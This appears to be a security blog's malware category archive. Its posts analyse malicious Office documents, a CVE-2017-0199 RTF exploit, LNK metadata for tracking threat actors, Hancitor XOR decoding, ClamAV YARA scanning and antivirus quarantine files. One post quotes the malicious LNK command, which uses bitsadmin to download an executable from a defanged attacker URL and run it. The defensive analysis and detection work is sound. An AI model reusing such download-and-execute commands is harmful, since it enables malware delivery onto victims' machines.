Category Archives: malware

Hunting malware with metadata

A while ago Michel wrote a blog post Tracking threat actors through .LNK files.

In this post, we want to illustrate how VirusTotal (retro) hunting can be leveraged to extract malware samples and metadata linked to a single threat actor. We use the power of YARA rules to pinpoint the metadata we are looking for.

With some of the metadata extracted from the .LNK file we wrote about in our previous blog post (Volume ID and MAC address), we’re going to search on VirusTotal for samples with that metadata. It is clear from the MAC address 00:0C:29:5A:39:04 that the threat actor used a virtual machine to build malware: 00:0C:29 is an OUI owned by VMware. We wonder if the same VM was used to create other samples.
With a VirusTotal Intelligence subscription, one can search through the VirusTotal sample database, for example with YARA rules. We use the following YARA rule for the metadata:

$BirthObjectId = {C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A}
$MACAddress = {00 0C 29 5A 39 04}
all of them

VTI supports hunting and retro-hunting with YARA rules. With hunting, you will be informed each time your YARA rules triggers on the VT servers each time a newly submitted sample matching your rule. With retro-hunting, YARA rules are used to scan through 75TB of samples in the VT database. This correspond more or less to the set of samples submitted in the last three months.
Here is the result from a retro-hunt using YARA rule MALDOC_LNK:

Next step is to download and analyse all these samples. Since we did not include a file type condition in our YARA rule, we get different types of files: Word .doc files, .lnk files, raw OLE streams containing .lnk files, and MIME files (e-mails with Word documents as attachment).
With this command we search for strings containing “http” in the samples:

So we see that the same virtual machine has been used to created several samples. Here we extract the commands launched via the .lnk file:

There are 2 types of commands: downloading one executable; and downloading one executable and a decoy document.

The metadata from the OLE files reveals that the virtual machine has been used for a couple of weeks:


With metadata and VirusTotal, it is possible to identify samples created by the same actor over a period of 3 months. These samples can provide new metadata and IOCs.

Analysis of a CVE-2017-0199 Malicious RTF Document

There is a new exploit (CVE-2017-0199) going around for which a patch was released by Microsoft on 11/04/2017. In this post, we analyze an RTF document exploiting this vulnerability and provide a YARA rule for detection. is a Python tool to analyze RTF documents. Running it on our sample produces a list with all “entities” in the RTF document (text enclosed between {}):

This is often a huge list with a lot of information. But here, we are interested in OLE 1.0 objects embedded within this RTF file. We can use the filter with option -f O for such objects:

There are 2 entities (objdata and datastore) with indices 153 and 249 (this is a number generated by rtfdump, it is not part of the RTF code). The content of an object is encoded with hexadecimal characters in an RTF file,  entity 153 contains 5448 hexademical characters. So let’s take a look by selecting this entity for deeper analysis with option -s 153:

In this hex/ascii dump, we can see that the text starts with 01050000 02000000, indicating an OLE 1.0 object. As the second line starts with d0cf11e0, we can guess it contains an OLE file.

With option -H, we can convert the hexadecimal characters to binary:

Now we can see the string OLE2Link, which has often been referred to when talking about this zero-day. With option -i, we can get more information about the embedded object:

So it is clearly an embedded OLE file, and the name OLE2Link followed by a zero byte was chosen to identify this embedded OLE file. With option -E, we can extract the embedded object:

Since this is an OLE file, we can analyze it with we dump the file with option -d and pipe it into oledump:

The OLE file contains 2 streams. Let’s take a look at the first stream:

We can recognize a URL, let’s extract it with strings:

Because of vulnerability CVE-2017-0199, this URL will automatically be downloaded. The web server serving this document, will identify it as an HTA file via a Content-Type header:

Because this download is performed by the URL Moniker, this moniker will recognize the content-type and open the downloaded file with Microsoft’s HTA engine. The downloaded HTA file might look to us like an RTF file, but the HTA parser will find the VBS script and execute it:

This VBS script performs several actions, ultimately downloading and executing a malicious executable.


Let’s take a second look at the first stream in the OLE file (the stream with the malicious URL):

The byte sequence that we selected here (E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B), is the binary representation of the URL Moniker GUID: {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}. Notice that the binary byte sequence and the text representation of the GUID is partially reversed, this is typical for GUIDs.

After the URL Moniker GUID, there is a length field, followed by the malicious URL (and then followed by a file closing sequence, …).

We use the following YARA rule to hunt for these RTF documents:

rule rtf_objdata_urlmoniker_http {
 $header = "{\\rtf1"
 $objdata = "objdata 0105000002000000" nocase
 $urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
 $http = "68007400740070003a002f002f00" nocase
 $header at 0 and $objdata and $urlmoniker and $http

Remark 1: we do not search for string OLE2Link

Remark 2: with a bit of knowledge of the RTF language, it is trivial to modify documents to bypass detection by this rule

Remark 3: the search for http:// (string $http) is case sensitive, and if you want, you can omit it (for example, it will not trigger on https).

Remark 4: there is no test for the order in which these strings appear

Happy hunting!

Tracking threat actors through .LNK files

In the blog post .LNK downloader and bitsadmin.exe in malicious Office document we were asked the following question by Harlan Carvey:

Did you parse the LNK file for things such as embedded MAC address, NetBIOS system name, any SID, and volume serial number?

We did not do that at the time, however we see the value in this to track specific threat actors throughout different campaigns.

The Windows .LNK file format contains valuable and information that is specific for the host on which that .LNK file has been created including:

  • The MAC address of the host;
  • The NetBIOS system name;
  • the volume serial number.

This is all information that will not easily be changed on the threat actors workstation and which should be fairly unique.

For more information on the .LNK file format, take a look at the following ForensicWiki page:

I used the tool lnkanalyser from woanware to analyse the extracted .LNK file.


Now what information are we seeing here.

NOTE: this tool does not show the relative path, on other .LNK files we tested this was shown. This particular .LNK file’s relative path refers to cmd.exe in the C:\Windows\System32 folder.

The first thing that stands out is the argument, this is everything that is passed on to command line, this has been discussed in the the blog post .LNK downloader and bitsadmin.exe in malicious Office document.

Next interesting item is the Target Metadata. The timestamps shown here are the timestamps of the target executable, in this case cmd.exe, of the executable on the system of the person creating this .LNK file.

Concluding we have four artefacts tied to the workstation on which this .LNK was created that can be used to track a threat actor:

  • Hard disk Serial number: 60BDBF2D
  • Volume ID: C2CC139818B9E241824054A8ADE20A9A
  • Machine ID: 123-¯ª
  • Mac address: 00:0C:29:5A:39:04


Didier Stevens created a comprehensive screencap on how to extract the .LNK file from the Word document and analyze it with lnkanalyzer.exe:


For an extensive explanation of .LNK file attributes, we’d like to refer you to the following research:

New Hancitor maldocs keep on coming…

Didier Stevens will provide NVISO training on malicious documents at Brucon Spring: Malicious Documents for Blue and Red Teams.

For more than half a year now we see malicious Office documents delivering Hancitor malware via a combination of VBA, shellcode and embedded executable. The VBA code decodes and executes the shellcode, the shellcode hunts for the embedded executable, decodes and executes it.

From the beginning, the embedded executable was encoded with a bit more complexity than a simple XOR operation. Here in the shellcode we see that the embedded executable is decoded by adding 3 to each byte and XORing with 17. Then base64 decoding and the EXE is decoded.


The gang behind Hancitor steadily delivered new maldocs, without changing much to this encoding method. Until about 2 months ago we started to see samples where the XOR key was a WORD (2 bytes) instead of a single byte.

Recently we received a sample that changed the encoding of the embedded executable again. This sample still uses macros, shellcode and an embedded executable:


The encoded shellcode is still in a form (stream 16), and the embedded executable is still in data (stream 5), appended after a PNG image:


If we look at the embedded executable, we see that the pattern has changed: in the beginning, we see a pattern of 4 repeating bytes. This is a strong indication that the group started to adopt a DWORD (4 bytes) key:


We can try to recover the xor key by performing a known plaintext attack: up til now, the embedded executables were base64 encoded and started with TVqQAA… Let’s use xor-kpa to try to recover the key:


We still find no key after trying out all add values between 1 and 16. Could it be that this time, it is just XOR encoded without addition? Let’s try:


Indeed! The key is xP4?.

We can now decode and extract the embedded executable:





The gang behind Hancitor has been creating complex malicious document to deliver their malware, and we constantly have to keep up our analysis techniques.

.LNK downloader and bitsadmin.exe in malicious Office document

We received a malicious office document (529581c1418fceda983336b002297a8e) that tricks the user into clicking on an embedded LNK file which in its turn uses the Microsoft Background Intelligent Transfer Service (BITS) to download a malicious binary from the internet.

The following Word document (in Japanese) claims to be an invoice, the user must click the Word icon to generate the amount to be paid.


When using to analyze this Word document we get the following output:

Screen Shot 2017-03-23 at 18.26.36

As you can see, in stream 8 an embedded OLE object is present. Using the following command we can obtain information on what this embedded OLE object exactly is: -s 8 -i ./document_669883.doc

Screen Shot 2017-03-23 at 18.28.14

The embedded object is thus an LNK file, we can then use the following command to get a hexdump on what this LNK file actually contains: -s 8 ./document_669883.doc

Screen Shot 2017-03-23 at 18.32.19

When going through this hexdump we can spot the intentions of this LNK file:

Screen Shot 2017-03-23 at 18.32.59

Now, to make this a bit easier to read we can use the following command: -s 8 -d document_669883.doc

Which provides the following output:

clean output.png

Opening the LNK file will execute the following command:

C:\Windows\System32\cmd.exe %windir% /c explorer.exe & bitsadmin.exe /transfer /priority high hxxp://av.ka289cisce[.]org/rh72.bin %AppData%\file.exe & %AppData%\file.exe

When looking at the timestamps of the Word document, we noticed that the file was last saved on 2017-03-22 19:20:00. The first sighting of this file on VirusTotal was already at 2017-03-22 23:15:59 UTC, less than 4 hour after it was last saved. This could explain why the link containing the binary file was no longer active at the time of our analysis (12 hours after first sighting on VirusTotal).

If you want to check if your organisation has been impacted by a similar document, you can detect the malicious downloads by looking through your proxy logs and searching for the following user agent: “Microsoft BITS/*”. While there are multiple software packages that use the BITS.EXE to download updates, these are currently still pretty limited, filtering for unique destination hosts will limit your dataset significantly enough for you to be able to spot the outlier(s) easily.

Hunting with YARA rules and ClamAV

Did you know the open-source anti-virus ClamAV supports YARA rules? What benefits can this bring to us? One of the important features ClamAV has is the file decomposition capability. Say that the file you want to analyze resides in an archive, or is a packed executable, then ClamAV will unarchive/unpack the file, and run the YARA engine on it.

Let’s start with a simple YARA rule to detect the string “!This program cannot be run in DOS mode”:


When we scan the notepad.exe PE file with this YARA rule, the rule (test1) triggers.

We can do the same with clamscan:


With option -d (database), we bypass ClamAV’s signature database defined in clamd.conf and instruct clamscan to use the YARA rule test1.yara.

As shown in the example above, using clamscan on the PE file notepad.exe also triggers the previously created YARA rule test1.yara: YARA.test1.UNOFFICIAL.

In this example we decided to use just one YARA rule for simplicity, but of course you can use several YARA rules together with ClamAV’s signature database. Just put your YARA rules (extension .yara or .yar) in the database folder.

As mentioned in the introduction, ClamAV can also look inside ZIP files and apply the YARA rules on all files found in archives:


This is something the standard YARA tool can not:


ClamAV’s YARA rules support does however have some limitations. You can not use modules (like the PE file module), or use YARA rule sets that contain external variables, tags, private rules, global rules, …Every rule must also have strings to search for (at least 2 bytes long). Rules with a condition and without strings are not supported.

Let us take a look at a rule to detect if a file is a PE file (see appendix for the details of the rule):


We get a warning from ClamAV: “yara rule contains no supported string”.

As ClamAV does not support rules without string: section. We must add a string to search for, even if the rule logic itself does not need it. Since a PE file contains string MZ, let’s search for that:


This time the rule triggers.

Now, a tricky case: how do we design a rule when we have no single string to search for? The ClamAV developers offer a work-around for such cases: search for any string, and add a condition checking for the presence OR absence of the string. Like this:


We search for string $a = “any string will do”, and we add condition ($a or not $a). It’s a bit of a hack, but it works.

ClamAV’s file decomposition features bring a lot to the table when it comes to YARA scanning, but in some cases it can be a bit too much. For example, ClamAV decompresses the VBA macro streams in Office documents for scanning. This means that we can use YARA rules to scan VBA source code. A simple rule searching for words AutoOpen and Declare would trigger on all Word documents with macros that run automatically and use the Windows API. Which is very nice to detect potential maldocs. However, ClamAV will apply this YARA rule to all files and decomposed/contained files. So if we feed ClamAV all kind of files (not only MS Office files), then the rule could also trigger (for example) on text files or e-mails that contain words AutoOpen and Declare.

If we could limit the scope of selected YARA rules to certain file types, this would help. Currently ClamAV supports signatures that are only applied to given file types (PE files, OLE files, …), unfortunately this is not supported for YARA files.

ClamAV is an interesting engine to run our YARA rules instead of the standard YARA engine. It has some limitations however, that can also generate false positives if we are not careful with the rules we use or design.

Deconstructing the YARA rule

Our example rule to detect a PE file contains just a condition:

uint16(0) = 0x5A4D and uint32(uint32(0x3C)) == 0x00004550

This rule does not use string searches. It checks a couple of values to determine if a file is a PE file. The checks it performs are:

  • see if the file starts with a MZ header, and;
  • contains a PE header.

First check: the first 2 bytes of the file are equal to MZ. uint16(0) = 0x5A4D.

Second check: the field (32-bit integer) at position 0x3C contains a pointer to a PE header. A PE header starts with bytes PE followed by 2 NULL bytes. uint32(uint32(0x3C)) == 0x00004550.

Functions uint16 and uint32 are little-endian, so we have to write the bytes in reverse order: MZ = 0x4D5A -> 0x5A4D

Working with GFI Cloud anti-virus quarantine files

We were recently requested to analyse a sample that was quarantined by GFI Cloud anti-virus. Based on our previous experiences with various anti-virus products we wanted to obtain the sample directly from the quarantine rather than restoring it first. Anti-virus products use quarantine files to safely store files that were detected as being malicious and thus are deleted (or cleaned). Usually, the content of the original (malicious) files is encoded before these are stored in a quarantine file.

These quarantine files are in the first place useful to restore files that were falsely detected as being malicious. From an analyst point of view, these quarantine files are particularly handy to determine if the file is indeed malicious or if it was erroneously quarantined.

When analysing a file that was detected and quarantined by anti-virus, we have found it to be preferable to try to extract the file directly from the quarantine file rather than through the anti-virus management console for three main reasons:

  • Restoring the quarantine file via the anti-virus management console could expose us to the risk of inadvertently opening the potentially malicious file;
  • Some anti-virus products will no longer protect us against a file restored from quarantine, therefor it is best only to restore false positives;
  • The restoring operation through the anti-virus software could also destroy metadata that is created on the quarantined file.

Additionally, malware analysts are typically not the people who would also administer the anti-virus solution. Grabbing these files directly from the quarantine allows the authorised administrators to safely provide potential malicious files to the malware analysts.

GFI  Cloud anti-virus quarantine files are stored inside the following folders:

C:\ProgramData\GFI Software\AntiMalware\Quarantine
C:\Users\All Users\GFI Software\AntiMalware\Quarantine

For each quarantined file, 2 files are created in the with the following structure:


The first file is an XML file containing metadata, such as the MD5 hash of the quarantined file and the original name and location of the file:


The second file contains the encoded, quarantined file (this file is referenced in the XML file):


The encoding used in this quarantine file is simple: each byte is XORed with value 0x33:


When a quarantined file is restored via the GFI management console, the 2 corresponding quarantine files .xml and _ENC2 are deleted and the original file is restored.

Concluding, when you are asked to analyse a sample that has been quarantined by an anti-virus product, we recommend to use the quarantine files directly for analysis, rather than restoring the quarantined file through the anti-virus management console. Using the metadata file you can easily grab the MD5 hash of the sample, and look it up on scanning services like VirusTotal. If the file can not be found there, then decode the _ENC2 file and start analysing it in a malware lab.